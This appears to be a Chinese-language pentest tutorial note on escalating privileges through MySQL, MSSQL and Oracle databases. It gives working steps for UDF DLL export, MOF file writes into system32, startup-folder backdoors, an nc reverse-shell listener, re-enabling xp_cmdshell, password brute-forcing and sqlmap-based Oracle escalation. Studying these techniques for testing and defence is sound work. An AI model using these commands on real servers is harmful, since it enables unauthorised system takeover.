六十:权限提升-MY&MS&ORA等SQL数据库提权

六十:权限提升-MY&MS&ORA等SQL数据库提权
在利用系统溢出漏洞无果的情况下,可以采用数据库提权,但需要知道数据库提权的前提条件:服务器开启数据库服务及获取到最高权限用户密码。除Access数据库外,其他数据库基本都是存在数据库提权的可能。
数据库应用提权在权限提升中的意义
WEB或本地环境如何探针数据库应用
数据库提权权限用户密码收集等方法
目前数据库提权对应的技术及方法

六十:权限提升-MY&MS&ORA等SQL数据库提权
Mysql数据库提权演示-脚本&MSF

案例:MYSQL数据库提权演示-脚本&MSF

流程:服务探针-信息收集-提权利用-获取权限

1.UDF提权知识点:(基于MYSQL调用命令执行函数)

读取网站数据库配置文件(了解其命名规则及查找技巧)

sql data inc config conn database common include等
读取数据库存储或备份文件(了解其数据库存储格式及对应内容)

https://blog.csdn.net/qq_36119192/article/details/84863268

@@basedir / data/数据库名/表名.myd
利用脚本暴力猜解(了解数据库是否支持外联及如何开启外联)
	若没开启外联,自写PHP脚本上传爆破工具,进行web爆破mysql密码
远程本地暴力猜解,服务器本地暴力猜解
利用自定义执行函数导出dll文件进行命令执行

select version() select @@basedir
手工创建plugin目录或利用NTFS流创建
select 'x' into dumpfile '目录/lib/plugin : :INDEX_ALLOCATION';
1.mysql<5.1导出目录c :/ windows或system32
2.mysql=>5.1导出安装目录/ lib/plugin/

2.MOF知识点:(基于MYsQz特性的安全问题)

导出自定义mof文件到系统目录加载
https://www.cnblogs.com/xishaonian/p/6384535.html
select load_file ('c:/phpstudy/PHPTutorial/www/user_add.mof') into outfile 'c:/windows/system32/wbem/mof/nullevt.mof' ;

3.启动项知识点:(基于配合操作系统自启动)

导出自定义可执行文件到启动目录配合重启执行
将创建好的后门或执行文件进行服务器启动项写入,配合重启执行!

4.反弹知识点:(基于利用反弹特性命令执行)

nc -l -p 5577

WEB后门上执行反弹函数,反弹云服务器上的IP及端口,云服务器上监听5577端口

案例:MssQL数据库提权演示-MssQL客户端

流程:服务探针-信息收集-提权利用-获取权限

1.使用xp_emdshell进行提权
xp_cmdshell默认在mssq12000中是开启的,在mssg12005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重修开启它。
启用:
EXEC sp_configure 'show advanced options',1
RECONEIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;

关闭:
exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'xp_cmdshell' , 0;
reconfigure;
执行

SQL sever 沙盒提权

Oracle提权演示-自动化工具

普通用户模式:
前提是拥有一个普通的oracle连接账号,不需要DBA权限,可提权至DBA,并以oracle实例运行的权限执行操作系统命令。

DBA用户模式:(自动化工具演示)
拥有DBA账号密码,可以省去自己手动创建存储过程的繁琐步骤,一键执行测试。

注入提升模式:(sqlmap测试演示)
拥有一个oracle注入点,可以通过注入点直接执行系统命令,此种模式没有实现回显,需要自己验证。

(JSP网站不需要提权,自带system权限)
上一篇:数据收发的拓展用法


下一篇:2021-05-31